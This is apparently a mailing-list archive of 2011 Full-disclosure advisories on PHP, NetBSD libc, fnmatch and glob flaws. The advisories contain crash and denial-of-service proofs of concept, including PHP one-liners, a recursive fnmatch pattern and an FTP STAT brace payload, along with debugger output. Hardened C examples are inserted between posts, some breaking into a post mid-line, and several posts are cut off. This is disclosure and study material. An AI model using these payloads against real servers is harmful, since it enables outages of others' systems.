sub   4096R/58BA663C 2010-09-19

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-22 Thread Maksymilian Arciemowicz

On 10/22/2011 11:14 AM, full-disclosure-requ...@lists.grok.org.uk wrote:
> If you had your way, would you see it implemented as /tmp/
> //tmp, or some other way?

per_user_tmp=yes ?

http://www.feyrer.de/NetBSD/bx/blosxom.cgi/index.front?-tags=tmp


- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19

[Full-disclosure] PHP 5.3.6 multiple null pointer dereference

2011-08-18 Thread Maksymilian Arciemowicz

[ PHP 5.3.6 multiple null pointer dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/

Date:
- - Dis.: 20.07.2011
- - Pub.: 19.08.2011

Affected Software (verified):
PHP 5.3.6 and prior

Fixed:
PHP 5.3.7

Original URL:
http://securityreason.com/achievement_securityalert/101


- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.


- --- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we reported a list of possible NULL pointer dereferences
in php 5.3.6. If the user may change the size of a malloc, it's possible
to get NULL pointer dereferences. I haven't had enough time to check the
security impact of all these bugs.

To demonstrate these flaws, we may use the default memory limit in
OpenBSD [512MB]. We should allocate a lot of memory, like 510MB (still
2MB free). If some string is longer than 2MB (for example 4MB), and php
tries to copy this string using malloc/strlen etc., then malloc returns
NULL. Then the program continues with possible NULL pointer dereference
or buffer overflow symptoms.

Example:
http://cwe.mitre.org/data/definitions/690.html

where CWE-690 leads to CWE-476 NULL pointer dereference

a good example of CWE-690 is

tz->location.comments = malloc(comments_len + 1);
memcpy(tz->location.comments, *tzf, comments_len);

This code may lead to a null pointer dereference, or a simple crash when
nulling memory with memset()

in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));

Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c : rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:Cannot access memory at address 0x0

In this case, memset() overwrites the memory with the 0x0 char. If an
attacker can put something other than 0x0 there, it would have security
impact.

There are more interesting places where the user may try to change the
size of a malloc. See below

- -id0-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup

820 if (!CRYPTO_get_id_callback()) {
821 int i, c = CRYPTO_num_locks();
822
823 php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));
824
825 for (i = 0; i < c; ++i) {
826 php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
827 }
828
829 CRYPTO_set_id_callback(php_curl_ssl_id);
830 CRYPTO_set_locking_callback(php_curl_ssl_lock);
831 }
- -id0-end-


- -id1-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc

323 uchar *buf = (uchar*) malloc(((s->lim - s->bot) +
BSIZE)*sizeof(uchar));
324 memcpy(buf, s->tok, s->lim - s->tok);

496 str = calloc(1, end - begin + 1);
497 memcpy(str, begin, end - begin);

346 s->errors->warning_messages =
realloc(s->errors->warning_messages, s->errors->warning_count *
sizeof(timelib_error_message));
347 s->errors->warning_messages[s->errors->warning_count -
1].position = s->tok ? s->tok - s->str : 0;
348 s->errors->warning_messages[s->errors->warning_count -
1].character = s->tok ? *s->tok : 0;
349 s->errors->warning_messages[s->errors->warning_count -
1].message = strdup(error);
- -id1-end-


- -id2-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup

210 tz->location.comments = malloc(comments_len + 1);
211 memcpy(tz->location.comments, *tzf, comments_len);
212 tz->location.comments[comments_len] = '\0';
213 *tzf += comments_len;
- -id2-end-


- -id3-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup

124 tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
125 tmp->trans_idx = (unsigned char*) malloc(tz->timecnt *
sizeof(unsigned char));
126 memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
127 memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt *
sizeof(unsigned char));
128
129 tmp->
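The unchecked-allocation pattern behind the zend_strndup() post (CVE-2011-4153) and the malloc()/memcpy() sites listed in this post, as one added C example that is not PHP's code: a zend_strndup()-shaped helper, an unchecked caller modelled on define(), and the checked form beside it. Allocation failure is simulated with a constructed size threshold (standing in for the ulimit and memory-limit settings the posts use), so the behaviour reproduces offline without exhausting memory; the helper, the struct and the threshold are this example's own assumptions.

```c
/* Added example, not PHP's code: the unchecked-allocation problem behind
 * CVE-2011-4153 (CWE-690 leading to CWE-476) shown as a zend_strndup()-style
 * helper with an unchecked and a checked caller.  Allocation failure is
 * simulated by a constructed size threshold, standing in for a hit
 * ulimit/memory limit, so the behaviour is reproducible offline. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed fault injection: requests above this many bytes "fail". */
static size_t alloc_threshold = 64;

static void *fallible_malloc(size_t n) {
    if (n > alloc_threshold)
        return NULL;
    return malloc(n);
}

/* Same shape as zend_strndup(): returns NULL when malloc() fails. */
char *my_strndup(const char *s, size_t length) {
    char *p = fallible_malloc(length + 1);
    if (p == NULL)
        return p;                     /* <=== callers must handle this */
    if (length)
        memcpy(p, s, length);
    p[length] = '\0';
    return p;
}

struct constant {
    char *name;
    size_t name_len;
};

/* Unchecked, like ZEND_FUNCTION(define): a NULL name is stored and would be
 * dereferenced later by zend_register_constant()'s strrchr()/strlen().
 * Here we only report whether NULL reached the struct; nothing is dereferenced. */
int define_unchecked(struct constant *c, const char *name, size_t len) {
    c->name = my_strndup(name, len);
    c->name_len = len + 1;
    return c->name == NULL;           /* 1 means a later use would crash */
}

/* Checked: fail closed and leave the struct untouched. */
int define_checked(struct constant *c, const char *name, size_t len) {
    char *dup = my_strndup(name, len);
    if (dup == NULL)
        return -1;                    /* propagate the failure, store nothing */
    c->name = dup;
    c->name_len = len + 1;
    return 0;
}

int main(void) {
    struct constant c = { NULL, 0 };
    char big[128];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("unchecked, 3 bytes:   null stored=%d\n", define_unchecked(&c, "FOO", 3));
    free(c.name);
    printf("unchecked, 127 bytes: null stored=%d\n", define_unchecked(&c, big, strlen(big)));
    printf("checked,   127 bytes: rc=%d name=%p\n",
           define_checked(&c, big, strlen(big)), (void *)c.name);
    return 0;
}
```

The same shape applies to the malloc()/memcpy() pairs quoted in this post: the check belongs between the allocation and the first use, and on failure the caller returns an error rather than continuing with a NULL destination.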

[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)

2011-08-18 Thread Maksymilian Arciemowicz

[ PHP 5.3.6 ZipArchive invalid use glob(3) ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- - Dis.: 01.04.2011
- - Pub.: 19.08.2011

CVE: CVE-2011-1657

Affected Software (verified):
PHP 5.3.6 and prior

Fixed:
PHP 5.3.7

Original URL:
http://securityreason.com/achievement_securityalert/100


- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.

ZipArchive
This extension enables you to transparently read or write ZIP compressed
archives and the files inside them.


- --- 1. PHP 5.3.6 ZipArchive invalid use glob(3) ---
Functions like addGlob and addPattern are not described in the
documentation. Anyway, we can call ZipArchive::addGlob and
ZipArchive::addPattern in PHP 5.3.6

http://pl2.php.net/manual/en/class.ziparchive.php

let's see ext/zip/php_zip.c

531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) {
...
1629 /* 1 == glob, 2==pcre */
1630 if (type == 1) {
1631     if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la",
1632         &pattern, &pattern_len, &flags, &options) == FAILURE) {
1633         return;
1634     }
1635 } else {
1636     if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa",
1637         &pattern, &pattern_len, &path, &path_len, &options) == FAILURE) {
1638         return;
1639     }
1640 }
1641

invalid &flags may lead to a crash. To use flags like GLOB_ALTDIRFUNC,
we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In
PHP we only have

508 glob_t globbuf;
...
530 globbuf.gl_offs = 0;
531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL,
&globbuf))) {

for addglob() there is no GLOB flags validation like in php/glob().
Only flags like
GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR
should be allowed:

- - GLOB_MARK - Adds a slash to each directory returned
- - GLOB_NOSORT - Return files as they appear in the directory (no sorting)
- - GLOB_NOCHECK - Return the search pattern if no files matching it were
found
- - GLOB_NOESCAPE - Backslashes do not quote metacharacters
- - GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c'
- - GLOB_ONLYDIR - Return only directory entries which match the pattern
- - GLOB_ERR - Stop on read errors (like unreadable directories), by
default errors are ignored.
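As an added example in C, not code from the advisory or from PHP: the allowlist the text describes, applied before glob(3) is ever called. The helper names and the sample pattern are this example's own; GLOB_ALTDIRFUNC, GLOB_BRACE and GLOB_ONLYDIR are BSD/glibc extensions, hence the _GNU_SOURCE define.

```c
/* Added example: allowlist glob(3) flags that come from untrusted input
 * before calling glob(3).  Not part of the advisory or of PHP; the helper
 * names are this example's own.  _GNU_SOURCE exposes GLOB_BRACE,
 * GLOB_ONLYDIR and GLOB_ALTDIRFUNC on glibc. */
#define _GNU_SOURCE
#include <glob.h>
#include <stdio.h>

/* The seven flags the advisory lists as safe to pass through. */
#define GLOB_ALLOWED (GLOB_MARK | GLOB_NOSORT | GLOB_NOCHECK | GLOB_NOESCAPE | \
                      GLOB_BRACE | GLOB_ONLYDIR | GLOB_ERR)

/* Strip every flag that is not on the allowlist.  GLOB_ALTDIRFUNC in
 * particular would make glob(3) call through the gl_opendir/gl_readdir/
 * gl_closedir/gl_lstat/gl_stat pointers of the glob_t, which a caller
 * that only zeroed gl_offs (as php_zip.c does) never set. */
int sanitize_glob_flags(int flags)
{
    return flags & GLOB_ALLOWED;
}

/* Run glob(3) with sanitized flags.  Returns the number of matches,
 * 0 when nothing matched, -1 on any other glob(3) error. */
long safe_glob_count(const char *pattern, int flags)
{
    glob_t g;
    long n;
    int rc;

    g.gl_offs = 0;                  /* GLOB_DOOFFS is stripped, so unused */
    g.gl_pathc = 0;
    g.gl_pathv = NULL;
    rc = glob(pattern, sanitize_glob_flags(flags), NULL, &g);
    if (rc == 0)
        n = (long)g.gl_pathc;
    else if (rc == GLOB_NOMATCH)
        n = 0;
    else
        n = -1;
    globfree(&g);                   /* safe: gl_pathv is NULL when nothing was allocated */
    return n;
}

int main(void)
{
    /* A request mixing a harmless flag with two that must never pass. */
    int requested = GLOB_ALTDIRFUNC | GLOB_DOOFFS | GLOB_NOCHECK;
    printf("requested 0x%x -> passed through 0x%x\n",
           requested, sanitize_glob_flags(requested));
    /* With GLOB_NOCHECK the unmatched pattern itself comes back as the
     * single result; with GLOB_ALTDIRFUNC still set this call would have
     * jumped through a NULL gl_opendir instead. */
    printf("matches: %ld\n", safe_glob_count("/no/such/dir/zz_*", requested));
    return 0;
}
```

The wrapper deliberately returns a count rather than the glob_t, so callers cannot forget globfree(); a real addGlob() would copy the names out before freeing.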

- ---linux/ubuntu---
cx@cx64:~$ php -v
PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
cx@cx64:~$ uname -a
Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011
x86_64 GNU/Linux
cx@cx64:/www$ cat zip.php
<?php $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39); ?>
cx@cx64:/www$ php zip.php
Segmentation fault
- ---linux/ubuntu---


Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)


- ---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();
$nx->open("empty.zip");
$nx->addGlob(str_repeat("A",100),0x39);

Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax            0x410041    4259905
ecx            0xc         12
edx            0xbfb0      -1078984704
ebx            0xbb8c81f4  -1148419596
esp            0xbfbfa980  0xbfbfa980
ebp            0xbfbfa9d8  0xbfbfa9d8
esi            0xfc000     1032192
edi            0x0         0
eip            0xbb86bb12  0xbb86bb12
(gdb) x/i $eip
0xbb86bb12:   mov    0x8(%eax),%edi
(gdb) x/i $eax
0x410041:   Cannot access memory at address 0x410041
- ---bsd/netbsd---

and now try 'B'

- ---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();
$nx->open("empty.zip");
$nx->addGlob(str_repeat("B",100),0x39);

(gdb) x/i $eip
0xbb86bb12:   mov    0x8(%eax),%edi
(gdb) x/i $eax
0x420042:   Cannot access memory at address 0x420042
- ---bsd/netbsd---

With 'A' we get mov 0x8(%eax),%edi where eax=0x410041;
with 'B' we get mov 0x8(%eax),%edi where eax=0x420042.

and once again for eax=0x0


- ---bsd/netbsd---
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39);

Program received signal SIGSEGV, Segmentation fault.
0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
(gdb) bt
#0 

[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow

2011-07-01 Thread Maksymilian Arciemowicz

[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- - Dis.: 01.04.2011
- - Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- - NetBSD 5.1 (fixed)

Affected functions:
- - getservbyname(3)
- - getservbyname_r(3)
- - getservbyport(3)
- - getservbyport_r(3)
- - getaddrinfo(3)
- - getnameinfo(3)

Original URL:
http://securityreason.com/achievement_securityalert/99


- --- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer
to an object with the following structure containing the broken-out
fields of a line in the network services data base,

 struct servent *
 getservbyname(const char *name, const char *proto);

 struct servent *
 getservbyport(int port, const char *proto);

The getservbyname() and getservbyport() functions sequentially search
from the beginning of the file until a matching protocol name or port
number is found, or until EOF is encountered.  If a protocol name is
also supplied (non-NULL), searches must also match the protocol.


- --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and
getservbyport_r.c. The functions getservbyname*(3), getservbyport*(3) and
getaddrinfo(3) of the NetBSD libc implementation can lead to a buffer
overflow. To demonstrate this issue, we may use PHP as an attack vector.

127# php -r 'getservbyname("A",str_repeat("A",7108));'
127# php -r 'getservbyname("A",str_repeat("A",7109));'
Memory fault (core dumped)

- -php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
    char *name, *proto;
    int name_len, proto_len;
    struct servent *serv;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name,
            &name_len, &proto, &proto_len) == FAILURE) {
        return;
    }
    ...
    serv = getservbyname(name, proto); <=== CALL TO LIBC
- -php-5.3.6/ext/standard/basic_functions.c---

BT:
#0  0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1  0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2  0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3  0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4  0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5  0x08334458 in php_get_highlight_struct ()

Let's see what is wrong with getservbyname().

- -getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
    struct servent *s;

    mutex_lock(&_servent_mutex);
    s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data); <=== REFERENCE
    mutex_unlock(&_servent_mutex);
    return (s);
}
- -getservbyname.c---

As we can see, getservbyname(3) delegates to getservbyname_r(3).

- -getservbyname_r.c---
    if (sd->flags & _SV_DB) {
        char buf[BUFSIZ];
        DBT key, data;
        DB *db = sd->db;
        key.data = buf;

        if (proto == NULL)
            key.size = snprintf(buf, sizeof(buf), "\376%s", name);           <= INVALID key.size HERE
        else
            key.size = snprintf(buf, sizeof(buf), "\376%s/%s", name, proto); <= INVALID key.size HERE
        key.size++;

        if ((*db->get)(db, &key, &data, 0) != 0)
            return NULL;

        if ((*db->get)(db, &data, &key, 0) != 0)
            return NULL;
- -getservbyname_r.c---

key.size may be bigger than BUFSIZ.

snprintf(3) returns the number of characters that would have been written
had size been sufficiently large (not counting the terminating null). In
this case, snprintf(3) returns a value larger than sizeof(buf). Older libc
implementations return -1 from snprintf(3) if the string is truncated.
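As an added example in C, not the NetBSD or PHP code: the key construction from getservbyname_r() written twice. The first version trusts the snprintf(3) return value as the key length exactly as the code above does; the second treats a return value at or above the buffer size as truncation and refuses. BUFSIZ is replaced by a 64-byte KEYBUF so the overflow is reachable with short strings, and the helper names are assumptions of this example.

```c
/* Added example (not NetBSD or PHP code): the getservbyname_r() key build
 * with and without a truncation check.  KEYBUF stands in for BUFSIZ. */
#include <stdio.h>
#include <string.h>

#define KEYBUF 64

/* Vulnerable form, as in getservbyname_r.c: the key size handed to the DB
 * layer is snprintf(3)'s return value plus one, whether or not that many
 * bytes actually exist in buf. */
size_t servkey_size_unchecked(char *buf, size_t buflen,
                              const char *name, const char *proto)
{
    int n = (proto == NULL)
        ? snprintf(buf, buflen, "\376%s", name)
        : snprintf(buf, buflen, "\376%s/%s", name, proto);
    return (size_t)n + 1;               /* key.size++ in the original */
}

/* Hardened form: C99 snprintf(3) reports the length it wanted to write;
 * anything >= buflen means the key was truncated and buf must not be used
 * as a key of that size.  Returns -1 in that case (and on encoding error). */
long servkey_size_checked(char *buf, size_t buflen,
                          const char *name, const char *proto)
{
    int n = (proto == NULL)
        ? snprintf(buf, buflen, "\376%s", name)
        : snprintf(buf, buflen, "\376%s/%s", name, proto);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return (long)n + 1;
}

/* Experiment helper: name "A" and a protocol of proto_len 'A's, the shape
 * of the PHP one-liner above.  Returns what the chosen variant reports. */
long servkey_try(size_t proto_len, int checked)
{
    char proto[1024];
    char buf[KEYBUF];

    if (proto_len >= sizeof proto)
        return -2;
    memset(proto, 'A', proto_len);
    proto[proto_len] = '\0';
    return checked ? servkey_size_checked(buf, sizeof buf, "A", proto)
                   : (long)servkey_size_unchecked(buf, sizeof buf, "A", proto);
}

int main(void)
{
    printf("proto_len=3   unchecked=%ld checked=%ld\n", servkey_try(3, 0), servkey_try(3, 1));
    printf("proto_len=100 unchecked=%ld checked=%ld\n", servkey_try(100, 0), servkey_try(100, 1));
    return 0;
}
```

With a 100-byte protocol the unchecked variant reports a 104-byte key backed by a 64-byte buffer; the DB layer's memcpy of that key is the read past the end of buf.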

The same problem is with getservbyport_r(3).

- -getservbyport_r.c---
    if (sd->flags & _SV_DB) {
        char buf[BUFSIZ];
        DBT key, data;
        DB *db = sd->db;
        key.data = buf;

        port = htons(port);
        if (proto == NULL)
            key.size = snprintf(buf, sizeof(buf), "\377%d", port);           <= INVALID key.size HERE
        else
            key.size = snprintf(buf, sizeof(buf), "\377%d/%s", port, proto); <= INVALID key.size HERE
        key.size++;

        if ((*db->get)(db, &key, &data, 0) != 0)
            return NULL;

if ((*db->get)(

[Full-disclosure] Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)

2011-05-12 Thread Maksymilian Arciemowicz

[ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- - Dis.: 29.01.2011
- - Pub.: 13.05.2011

CVE: CVE-2011-0419
CWE: CWE-399

Affected Software (verified):
- - Apache 2.2.17
- - NetBSD 5.1
- - OpenBSD 4.8
- - FreeBSD
- - MacOSX 10.6
- - SunSolaris 10

Original URL:
http://securityreason.com/achievement_securityalert/98


- --- 0.Description ---
fnmatch -- match filename or pathname using shell glob rules

SYNOPSIS
 #include <fnmatch.h>

 int
 fnmatch(const char *pattern, const char *string, int flags);


- --- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
An attacker who can control the first and second parameters (pattern,
string) of fnmatch(3) can cause CPU resource exhaustion. To see the
problem's huge complexity, try compiling the code below:

fnmatch("?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*","xx",0);

fnmatch(3) should return its answer (an int) quickly.

- -fnmatch()/netbsd/fnmatch.c--
/* Collapse multiple stars. */
while (c == '*')
c = FOLDCASE(*++pattern, flags);
- -fnmatch()/netbsd/fnmatch.c--

fnmatch() collapses multiple stars here. That protects against patterns
like "...", but not against "*?*?*?*?*?*?*?*?*?*?*?...". Let's see what
happens if we use a single star in the pattern:

- -fnmatch()/netbsd/fnmatch.c--
        case '*':
            c = FOLDCASE(*pattern, flags);
            /* Collapse multiple stars. */
            while (c == '*')
                c = FOLDCASE(*++pattern, flags);

            if (*string == '.' && (flags & FNM_PERIOD) &&
                (string == stringstart ||
                ((flags & FNM_PATHNAME) && *(string - 1) == '/')))
                return (FNM_NOMATCH);

            ...

            /* General case, use recursion. */
            while ((test = FOLDCASE(*string, flags)) != EOS) {
                if (!fnmatch(pattern, string, flags & ~FNM_PERIOD))   <== RECURSION
                    return (0);
                if (test == '/' && flags & FNM_PATHNAME)
                    break;
                ++string;
            }
            return (FNM_NOMATCH);
- -fnmatch()/netbsd/fnmatch.c--

The recursion in this code,

    if (!fnmatch(pattern, string, ...   <=== RECURSION WITHOUT LIMITS

may cause a denial of service: a recursion limit is missing here. A fix
has been created together with NetBSD and should work on all BSD
implementations of fnmatch(3). To fix it, limit recursion_level to 64,
because that guarantees a quick result, e.g.:

- -fix---
...
static int
fnmatchx(const char *pattern, const char *string, int flags, size_t recursion) <=== ADD ( size_t recursion )
{
    const char *stringstart;
    char c, test;

    _DIAGASSERT(pattern != NULL);
    _DIAGASSERT(string != NULL);

    if (recursion-- == 0)               <=== DECREMENT recursion_level
        return FNM_NORES;

...
int
fnmatch(const char *pattern, const char *string, int flags)
{
    return fnmatchx(pattern, string, flags, 64); <=== SET recursion_level HERE
}
...
- -fix---

This fix limits the maximum recursion level to 64; any larger value may be unsafe.

To demonstrate this flaw I'm using Apache with mod_autoindex, because it
is the best vector here. There are two ways to cause a denial of service,
local and remote.

IMPORTANT:
fnmatch(const char *pattern, const char *string, int flags);

strlen(string) should be smaller than strlen(pattern).

Let's start:

- -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---
...
            /* Collapse multiple stars. */
            while (c == '*') {
                c = *++pattern;
            }
...

            /* General case, use recursion. */
            while ((test = *string) != EOS) {
                if (!apr_fnmatch(pattern, string, flags & ~APR_FNM_PERIOD)) {   <=== RECURSION
                    return (APR_SUCCESS);
...
- -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---

This is BSD implementation of 

[Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion

2011-05-01 Thread Maksymilian Arciemowicz

[ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
 - Dis.: 19.01.2011
 - Pub.: 02.05.2011

CVE: CVE-2011-0418

Affected Software (verified):
- - NetBSD 5.1
- - and more

Original URL:
http://securityreason.com/achievement_securityalert/97


- --- 0.Description ---
#include <glob.h>

int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description

This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This
option should be set for programs that can be coerced to a denial of
service attack via patterns that expand to a very large number of
matches, such as a long string of */../*/..


- --- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory
exhaustion ---
Analysing the history of GLOB_LIMIT, we should start in 2001, when it was
added to protect FTP servers against memory exhaustion.

http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html

Any 'pattern' should be limited and controlled by GLOB_LIMIT. The
algorithm used in glob(3) is not optimal and does not use functions like
realpath() to eliminate duplicates. It is not easy to predict the
greatest possible complexity. Anyway, in 2010 NetBSD extended GLOB_LIMIT
with a few new limits: stats, readdir and malloc.

OpenBSD has located an integer overflow. In glob(3) there is a malloc()
allowing to allocate n
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h

- -globextend()/openbsd--
  749:  newn = 2 + pglob->gl_pathc + pglob->gl_offs;
  750:  if (pglob->gl_offs >= INT_MAX ||
  751:  pglob->gl_pathc >= INT_MAX ||
  752:  newn >= INT_MAX ||
  753:  SIZE_MAX / sizeof(*pathv) <= newn ||
  754:  SIZE_MAX / sizeof(*statv) <= newn) {
  755:  nospace:
  756:  for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {
  757:  if (pglob->gl_pathv && pglob->gl_pathv[i])
  758:  free(pglob->gl_pathv[i]);
  759:  if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&
  760:  pglob->gl_pathv && pglob->gl_pathv[i])
  761:  free(pglob->gl_statv[i]);
  762:  }
  763:  if (pglob->gl_pathv) {
  764:  free(pglob->gl_pathv);
  765:  pglob->gl_pathv = NULL;
  766:  }
  767:  if (pglob->gl_statv) {
  768:  free(pglob->gl_statv);
  769:  pglob->gl_statv = NULL;
  770:  }
  771:  return(GLOB_NOSPACE);
  772:  }
- -globextend()/openbsd--

However, SIZE_MAX and INT_MAX do not protect us against memory
exhaustion. The real problem here is the uncontrolled malloc(3) call.
globextend() will be executed many times, so we should reduce the calls
to glob0() and globexp1(). Therefore a new limit has been created,
limiting the 'braces' used in 'pattern'.

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29

If this call is not reduced:

- -globextend()/netbsd--
static int
globextend(const Char *path, glob_t *pglob, size_t *limit)
{
    char **pathv;
    size_t i, newsize, len;
    char *copy;
    const Char *p;

    _DIAGASSERT(path != NULL);
    _DIAGASSERT(pglob != NULL);

    newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
    pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :
        malloc(newsize);                    <=== UNSAFE CALL
...
- -globextend()/netbsd--

newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);

malloc(3) tries to allocate (4*pglob->gl_pathc) bytes.

- -PoC-
USER anonymous
PASS b...@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
- -PoC-

The result:

Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out
of swap
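As an added example in C, not NetBSD's glob.c or its fix: a caller-side pre-check that counts how many paths a GLOB_BRACE pattern would expand into before glob(3) is called, so an FTP daemon can refuse the STAT above instead of discovering the cost inside globextend(). It handles nested groups, which goes beyond the flat {a,b} chain of the PoC; the function names and the limit value are this example's own, and it complements rather than replaces the in-libc brace limit the text mentions.

```c
/* Added example (not libc code): count brace expansions of a pattern
 * before calling glob(3).  Grammar handled: literal text, "\x" escapes,
 * and "{a,b,...}" groups that may nest.  A pattern's count is the product
 * over its segments; a group's count is the sum over its alternatives. */
#include <stdio.h>

static unsigned long parse_seq(const char **pp, int in_group,
                               unsigned long limit, int *bad);

/* Called with *pp just past '{'.  Leaves *pp just past the matching '}'. */
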